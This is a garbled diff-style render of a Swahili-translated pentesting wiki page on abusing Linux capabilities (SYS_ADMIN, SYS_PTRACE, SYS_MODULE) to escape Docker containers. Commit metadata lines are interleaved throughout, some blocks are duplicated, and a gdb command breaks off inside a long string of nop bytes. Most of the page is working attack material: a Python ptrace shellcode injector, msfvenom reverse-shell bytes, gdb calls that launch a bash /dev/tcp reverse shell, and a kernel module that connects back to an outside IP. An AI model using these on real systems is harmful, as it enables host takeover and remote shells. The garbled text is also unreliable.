											2024-02-11 02:13:58 +00:00
+								secure-noroot: no (unlocked)
 								secure-no-suid-fixup: no (unlocked)
 								secure-keep-caps: no (unlocked)
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								uid=0(root)
 								gid=0(root)
 								groups=0(root)
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ndani ya matokeo ya awali unaweza kuona kuwa uwezo wa SYS_ADMIN umewezeshwa.
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								* **Kuunganisha**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Hii inaruhusu kontena ya docker kuunganisha diski ya mwenyeji na kuiwezesha kupata kwa uhuru:
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```bash
 								fdisk -l #Get disk name
 								Disk /dev/sda: 4 GiB, 4294967296 bytes, 8388608 sectors
 								Units: sectors of 1 * 512 = 512 bytes
 								Sector size (logical/physical): 512 bytes / 512 bytes
 								I/O size (minimum/optimal): 512 bytes / 512 bytes
 								mount /dev/sda /mnt/ #Mount it
 								cd /mnt
 								chroot ./ bash #You have a shell inside the docker hosts disk
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								* **Upatikanaji kamili**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Katika njia iliyotangulia tulifanikiwa kupata ufikiaji wa diski ya mwenyeji wa docker.\
 								Ikiwa utagundua kuwa mwenyeji anaendesha seva ya **ssh**, unaweza **kuunda mtumiaji ndani ya diski ya mwenyeji wa docker** na kufikia kupitia SSH:
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```bash
-												added missing chars in some words
											
										
										
											2023-02-24 20:12:15 +00:00
+								#Like in the example before, the first step is to mount the docker host disk
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								fdisk -l
 								mount /dev/sda /mnt/
 								#Then, search for open ports inside the docker host
 								nc -v -n -w2 -z 172.17.0.1 1-65535
 								(UNKNOWN) [172.17.0.1] 2222 (?) open
 								#Finally, create a new user inside the docker host and use it to access via SSH
 								chroot /mnt/ adduser john
 								ssh john@172.17.0.1 -p 2222
 								```
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_SYS\_PTRACE
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Hii inamaanisha kuwa unaweza kutoroka kwenye chombo kwa kuingiza shellcode ndani ya mchakato fulani unaoendesha ndani ya mwenyeji.** Ili kupata ufikiaji wa michakato inayoendesha ndani ya mwenyeji, chombo kinahitaji kuendeshwa angalau na **`--pid=host`**.
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**[`CAP_SYS_PTRACE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** inaruhusu uwezo wa kutumia utambuzi na ufuatiliaji wa kazi za mfumo zinazotolewa na `ptrace(2)` na wito wa kuambatisha kumbukumbu kama vile `process_vm_readv(2)` na `process_vm_writev(2)`. Ingawa ni yenye nguvu kwa madhumuni ya uchunguzi na ufuatiliaji, ikiwa `CAP_SYS_PTRACE` inawezeshwa bila hatua za kizuizi kama vile kichujio cha seccomp kwenye `ptrace(2)`, inaweza kuhatarisha sana usalama wa mfumo. Hasa, inaweza kutumika kuzunguka vizuizi vingine vya usalama, haswa vile vilivyowekwa na seccomp, kama inavyodhihirishwa na [uthibitisho wa dhana (PoC) kama huu](https://gist.github.com/thejh/8346f47e359adecd1d53).
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na binary (python)**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```bash
 								getcap -r / 2>/dev/null
 								/usr/bin/python2.7 = cap_sys_ptrace+ep
 								```
 								```python
 								import ctypes
 								import sys
 								import struct
 								# Macros defined in <sys/ptrace.h>
 								# https://code.woboq.org/qt5/include/sys/ptrace.h.html
 								PTRACE_POKETEXT = 4
 								PTRACE_GETREGS = 12
 								PTRACE_SETREGS = 13
 								PTRACE_ATTACH = 16
 								PTRACE_DETACH = 17
 								# Structure defined in <sys/user.h>
 								# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct
 								class user_regs_struct(ctypes.Structure):
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								_fields_ = [
 								("r15", ctypes.c_ulonglong),
 								("r14", ctypes.c_ulonglong),
 								("r13", ctypes.c_ulonglong),
 								("r12", ctypes.c_ulonglong),
 								("rbp", ctypes.c_ulonglong),
 								("rbx", ctypes.c_ulonglong),
 								("r11", ctypes.c_ulonglong),
 								("r10", ctypes.c_ulonglong),
 								("r9", ctypes.c_ulonglong),
 								("r8", ctypes.c_ulonglong),
 								("rax", ctypes.c_ulonglong),
 								("rcx", ctypes.c_ulonglong),
 								("rdx", ctypes.c_ulonglong),
 								("rsi", ctypes.c_ulonglong),
 								("rdi", ctypes.c_ulonglong),
 								("orig_rax", ctypes.c_ulonglong),
 								("rip", ctypes.c_ulonglong),
 								("cs", ctypes.c_ulonglong),
 								("eflags", ctypes.c_ulonglong),
 								("rsp", ctypes.c_ulonglong),
 								("ss", ctypes.c_ulonglong),
 								("fs_base", ctypes.c_ulonglong),
 								("gs_base", ctypes.c_ulonglong),
 								("ds", ctypes.c_ulonglong),
 								("es", ctypes.c_ulonglong),
 								("fs", ctypes.c_ulonglong),
 								("gs", ctypes.c_ulonglong),
 								]
-												GitBook: [master] 514 pages and 4 assets modified
											
										
										
											2021-09-12 10:36:22 +00:00
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								libc = ctypes.CDLL("libc.so.6")
 								pid=int(sys.argv[1])
 								# Define argument type and respone type.
 								libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
 								libc.ptrace.restype = ctypes.c_uint64
 								# Attach to the process
 								libc.ptrace(PTRACE_ATTACH, pid, None, None)
 								registers=user_regs_struct()
 								# Retrieve the value stored in registers
 								libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))
 								print("Instruction Pointer: " + hex(registers.rip))
 								print("Injecting Shellcode at: " + hex(registers.rip))
 								# Shell code copied from exploit db. https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c
 								shellcode = "\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"
 								# Inject the shellcode into the running process byte by byte.
 								for i in xrange(0,len(shellcode),4):
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								# Convert the byte to little endian.
 								shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)
 								shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
 								shellcode_byte=int(shellcode_byte_little_endian,16)
-												GitBook: [master] 514 pages and 4 assets modified
											
										
										
											2021-09-12 10:36:22 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								# Inject the byte.
 								libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
 								print("Shellcode Injected!!")
 								# Modify the instuction pointer
 								registers.rip=registers.rip+2
 								# Set the registers
 								libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))
 								print("Final Instruction Pointer: " + hex(registers.rip))
 								# Detach from the process.
 								libc.ptrace(PTRACE_DETACH, pid, None, None)
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na faili (gdb)**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								`gdb` na uwezo wa `ptrace`:
-												GITBOOK-3845: change request with no subject merged in GitBook

											
										
										
											2023-03-29 12:42:51 +00:00
+								```
 								/usr/bin/gdb = cap_sys_ptrace+ep
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								# Unda Shellcode na msfvenom kuingiza kwenye kumbukumbu kupitia gdb
 								Ili kuunda shellcode na msfvenom na kuiingiza kwenye kumbukumbu kupitia gdb, unaweza kufuata hatua zifuatazo:
 . Kwanza, tumia msfvenom kuunda payload ya shellcode. Chagua payload inayofaa kwa kusudi lako, kama vile `linux/x86/shell_reverse_tcp`. Chini ni mfano wa amri ya msfvenom:
 								   ```
 								   msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP yako> LPORT=<Namba ya bandari> -f raw -o shellcode
 								   ```
-												GITBOOK-3845: change request with no subject merged in GitBook

											
										
										
											2023-03-29 12:42:51 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								   Badilisha `<IP yako>` na anwani ya IP ya mashine yako ya kusikiliza na `<Namba ya bandari>` na namba ya bandari unayotaka kutumia.
-												GITBOOK-3845: change request with no subject merged in GitBook

											
										
										
											2023-03-29 12:42:51 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+. Baada ya kutekeleza amri hiyo, msfvenom itaunda faili ya shellcode inayoitwa "shellcode".
 . Sasa, fungua gdb na uanze kutekeleza programu ambayo unataka kuingiza shellcode ndani yake.
 . Mara tu programu inapopakia kwenye gdb, tumia amri ifuatayo kuingiza shellcode kwenye kumbukumbu:
 								   ```
 								   set {unsigned char *}0x<Anwani ya kumbukumbu> = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
-												GITBOOK-3845: change request with no subject merged in GitBook

											
										
										
											2023-03-29 12:42:51 +00:00
+								```python
 								# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=9001 -f py -o revshell.py
 								buf =  b""
 								buf += b"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05"
 								buf += b"\x48\x97\x48\xb9\x02\x00\x23\x29\x0a\x0a\x0e\x0b"
 								buf += b"\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05"
 								buf += b"\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
 								buf += b"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f"
 								buf += b"\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6"
 								buf += b"\x0f\x05"
 								# Divisible by 8
 								payload = b"\x90" * (8 - len(buf) % 8 ) + buf
 								# Change endianess and print gdb lines to load the shellcode in RIP directly
 								for i in range(0, len(buf), 8):
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								chunk = payload[i:i+8][::-1]
 								chunks = "0x"
 								for byte in chunk:
 								chunks += f"{byte:02x}"
-												GITBOOK-3845: change request with no subject merged in GitBook

											
										
										
											2023-03-29 12:42:51 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								print(f"set {{long}}($rip+{i}) = {chunks}")
-												GITBOOK-3845: change request with no subject merged in GitBook

											
										
										
											2023-03-29 12:42:51 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Chunguza kwa kina mchakato wa mizizi na gdb na nakili na ubandike mistari ya gdb iliyotengenezwa hapo awali:
-												GITBOOK-3845: change request with no subject merged in GitBook

											
										
										
											2023-03-29 12:42:51 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								```bash
 								$ gdb -p <pid>
 								(gdb) set follow-fork-mode child
 								(gdb) set detach-on-fork off
 								(gdb) catch exec
 								(gdb) run
 								```
-												GITBOOK-3845: change request with no subject merged in GitBook

											
										
										
											2023-03-29 12:42:51 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								```bash
 								$ gdb -p <pid>
 								(gdb) set follow-fork-mode child
 								(gdb) set detach-on-fork off
 								(gdb) catch exec
 								(gdb) run
 								```
-												GITBOOK-3845: change request with no subject merged in GitBook

											
										
										
											2023-03-29 12:42:51 +00:00
+								```bash
 								# In this case there was a sleep run by root
 								## NOTE that the process you abuse will die after the shellcode
 								/usr/bin/gdb -p $(pgrep sleep)
 								[...]
 								(gdb) set {long}($rip+0) = 0x296a909090909090
 								(gdb) set {long}($rip+8) = 0x5e016a5f026a9958
 								(gdb) set {long}($rip+16) = 0x0002b9489748050f
 								(gdb) set {long}($rip+24) = 0x48510b0e0a0a2923
 								(gdb) set {long}($rip+32) = 0x582a6a5a106ae689
 								(gdb) set {long}($rip+40) = 0xceff485e036a050f
 								(gdb) set {long}($rip+48) = 0x6af675050f58216a
 								(gdb) set {long}($rip+56) = 0x69622fbb4899583b
 								(gdb) set {long}($rip+64) = 0x8948530068732f6e
 								(gdb) set {long}($rip+72) = 0x050fe689485752e7
 								(gdb) c
 								Continuing.
 								process 207009 is executing new program: /usr/bin/dash
 								[...]
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na mazingira (Docker breakout) - Matumizi mengine ya gdb**
-												GITBOOK-3845: change request with no subject merged in GitBook

											
										
										
											2023-03-29 12:42:51 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ikiwa **GDB** imefungwa (au unaweza kuifunga kwa kutumia `apk add gdb` au `apt install gdb` kwa mfano), unaweza **kudebugi mchakato kutoka kwenye mwenyeji** na kumfanya aite kazi ya `system`. (Mbinu hii pia inahitaji uwezo wa `SYS_ADMIN`).
-												GITBOOK-3845: change request with no subject merged in GitBook

											
										
										
											2023-03-29 12:42:51 +00:00
+								```bash
 								gdb -p 1234
 								(gdb) call (void)system("ls")
 								(gdb) call (void)system("sleep 5")
 								(gdb) call (void)system("bash -c 'bash -i >& /dev/tcp/192.168.115.135/5656 0>&1'")
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Hutaweza kuona matokeo ya amri iliyotekelezwa lakini itatekelezwa na mchakato huo (hivyo pata rev shell).
-												GITBOOK-3845: change request with no subject merged in GitBook

											
										
										
											2023-03-29 12:42:51 +00:00
 								{% hint style="warning" %}
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ikiwa unapata kosa "Hakuna ishara "system" katika muktadha wa sasa." angalia mfano uliopita wa kupakia shellcode katika programu kupitia gdb.
-												GITBOOK-3845: change request with no subject merged in GitBook

											
										
										
											2023-03-29 12:42:51 +00:00
+								{% endhint %}
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na mazingira (Docker breakout) - Uingizaji wa Shellcode**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Unaweza kuangalia uwezo uliowezeshwa ndani ya kontena ya docker kwa kutumia:
-												a

											
										
										
											2024-02-07 04:06:18 +00:00
+								```bash
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								capsh --print
 								Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap+ep
 								Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap
 								Securebits: 00/0x0/1'b0
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								secure-noroot: no (unlocked)
 								secure-no-suid-fixup: no (unlocked)
 								secure-keep-caps: no (unlocked)
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								uid=0(root)
 								gid=0(root)
 								groups=0(root
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Orodhesha **mchakato** unaofanya kazi kwenye **mwenyeji** `ps -eaf`
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+. Pata **usanifu** `uname -m`
 . Tafuta **shellcode** kwa usanifu ([https://www.exploit-db.com/exploits/41128](https://www.exploit-db.com/exploits/41128))
 . Tafuta **programu** ya **kuingiza** **shellcode** kwenye kumbukumbu ya mchakato ([https://github.com/0x00pf/0x00sec\_code/blob/master/mem\_inject/infect.c](https://github.com/0x00pf/0x00sec\_code/blob/master/mem\_inject/infect.c))
 . **Badilisha** shellcode ndani ya programu na **itafsiri** `gcc inject.c -o inject`
 . **Ingiza** na pata **shell** yako: `./inject 299; nc 172.17.0.1 5600`
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_SYS\_MODULE
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**[`CAP_SYS_MODULE`](https://man7.org/linux/man-pages/man7/capabilities.7.html)** inawezesha mchakato kufanya **upakiaji na uondolewaji wa moduli za kernel (`init_module(2)`, `finit_module(2)` na `delete_module(2)` wito wa mfumo)**, ikitoa ufikiaji moja kwa moja kwa shughuli za msingi za kernel. Uwezo huu unaweka hatari kubwa ya usalama, kwani inawezesha kuongeza mamlaka na kuhatarisha mfumo mzima kwa kuruhusu mabadiliko kwenye kernel, hivyo kukiuka taratibu zote za usalama za Linux, ikiwa ni pamoja na Moduli za Usalama za Linux na kizuizi cha kontena.
 								**Hii inamaanisha kuwa unaweza** **kuweka/kuondoa moduli za kernel kwenye mashine ya mwenyeji.**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na binary**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Katika mfano ufuatao, binary **`python`** ina uwezo huu.
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```bash
 								getcap -r / 2>/dev/null
 								/usr/bin/python2.7 = cap_sys_module+ep
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kwa chaguo-msingi, amri ya **`modprobe`** inachunguza orodha ya utegemezi na faili za ramani katika saraka **`/lib/modules/$(uname -r)`**.\
 								Ili kutumia hili vibaya, hebu tujenge saraka bandia ya **lib/modules**:
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```bash
 								mkdir lib/modules -p
 								cp -a /lib/modules/5.0.0-20-generic/ lib/modules/$(uname -r)
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Kisha **kamilisha moduli ya kernel unaweza kupata mifano 2 hapa chini na nakili** kwenye folda hii:
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```bash
 								cp reverse-shell.ko lib/modules/$(uname -r)/
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Hatimaye, tekeleza msimbo wa python unaohitajika ili kupakia kifurushi hiki cha kernel:
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```python
 								import kmod
 								km = kmod.Kmod()
 								km.set_mod_dir("/path/to/fake/lib/modules/5.0.0-20-generic/")
 								km.modprobe("reverse-shell")
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano 2 na binary**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Katika mfano ufuatao binary **`kmod`** ina uwezo huu.
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```bash
 								getcap -r / 2>/dev/null
 								/bin/kmod = cap_sys_module+ep
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Hii inamaanisha kwamba ni rahisi kutumia amri **`insmod`** kuweka moduli ya kernel. Fuata mfano hapa chini ili kupata **shell ya nyuma** kwa kutumia mamlaka haya.
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Mfano na mazingira (Docker breakout)**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Unaweza kuangalia uwezo uliowezeshwa ndani ya kontena ya docker kwa kutumia:
-												a

											
										
										
											2024-02-07 04:06:18 +00:00
+								```bash
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								capsh --print
 								Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep
 								Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
 								Securebits: 00/0x0/1'b0
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								secure-noroot: no (unlocked)
 								secure-no-suid-fixup: no (unlocked)
 								secure-keep-caps: no (unlocked)
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								uid=0(root)
 								gid=0(root)
 								groups=0(root)
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Ndani ya matokeo ya awali unaweza kuona kuwa uwezo wa **SYS\_MODULE** umewezeshwa.
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Tengeneza** **moduli ya kernel** ambayo itatekeleza kitanzi cha kurudisha na **Makefile** ya **kuikusanya**:
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
 								{% code title="reverse-shell.c" %}
 								```c
 								#include <linux/kmod.h>
 								#include <linux/module.h>
 								MODULE_LICENSE("GPL");
 								MODULE_AUTHOR("AttackDefense");
 								MODULE_DESCRIPTION("LKM reverse shell module");
 								MODULE_VERSION("1.0");
-												GitBook: [master] one page modified
											
										
										
											2021-07-04 09:24:29 +00:00
+								char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/10.10.14.8/4444 0>&1", NULL};
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
 								// call_usermodehelper function is used to create user mode processes from kernel space
 								static int __init reverse_shell_init(void) {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								}
 								static void __exit reverse_shell_exit(void) {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								printk(KERN_INFO "Exiting\n");
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								}
 								module_init(reverse_shell_init);
 								module_exit(reverse_shell_exit);
 								```
 								{% code title="Makefile" %}
 								```bash
 								obj-m +=reverse-shell.o
 								all:
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
 								clean:
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```
 								{% endcode %}
 								{% hint style="warning" %}
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Neno tupu kabla ya kila neno la kufanya katika faili ya Kufanya **lazima iwe tab, sio nafasi**!
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								{% endhint %}
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Tumia `fanya` ili kuikusanya.
-												GitBook: No commit message

											
										
										
											2021-10-10 10:09:05 +00:00
+								```
-												GitBook: No commit message

											
										
										
											2021-10-10 10:10:04 +00:00
+								ake[1]: *** /lib/modules/5.10.0-kali7-amd64/build: No such file or directory.  Stop.
 								sudo apt update
-												GitBook: No commit message

											
										
										
											2021-10-10 11:58:02 +00:00
+								sudo apt full-upgrade
-												GitBook: No commit message

											
										
										
											2021-10-10 10:07:48 +00:00
+								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Hatimaye, anza `nc` ndani ya kikao na **pakiwa moduli** kutoka kikao kingine na utapata kikao katika mchakato wa nc:
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
+								```bash
 								#Shell 1
 								nc -lvnp 4444
 								#Shell 2
 								insmod reverse-shell.ko #Launch the reverse shell
 								```
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								**Msimbo wa mbinu hii ulichukuliwa kutoka kwenye maabara ya "Abusing SYS\_MODULE Capability" kutoka** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Mfano mwingine wa mbinu hii unaweza kupatikana katika [https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host](https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host)
-												GitBook: [#2951] No subject

											
										
										
											2022-01-16 17:15:05 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## CAP\_DAC\_READ\_SEARCH
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								[**CAP\_DAC\_READ\_SEARCH**](https://man7.org/linux/man-pages/man7/capabilities.7.html) inawezesha mchakato kukiuka ruhusa za kusoma faili na kusoma na kutekeleza saraka. Matumizi yake kuu ni kwa ajili ya utafutaji wa faili au kusoma. Walakini, pia inaruhusu mchakato kutumia kazi ya `open_by_handle_at(2)`, ambayo inaweza kupata faili yoyote, ikiwa ni pamoja na zile nje ya kipekee cha mchakato. Kipekee kinachotumiwa katika `open_by_handle_at(2)` kinapaswa kuwa kitambulisho kisichoweza kuonekana kupitia `name_to_handle_at(2)`, lakini inaweza kujumuisha habari nyeti kama nambari za inode ambazo zinaweza kudukuliwa. Uwezekano wa kutumia uwezo huu, haswa katika muktadha wa vyombo vya Docker, ulidhihirishwa na Sebastian Krahmer na shambulio la shocker, kama ilivyoainishwa [hapa](https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3).
 								**Hii inamaanisha kuwa unaweza kukiuka ukaguzi wa ruhusa za kusoma faili na ukaguzi wa ruhusa za kusoma/utekelezaji wa saraka.**
-												GitBook: [master] one page and one asset modified
											
										
										
											2021-01-06 22:59:28 +00:00
-												Translated to Swahili

											
										
										
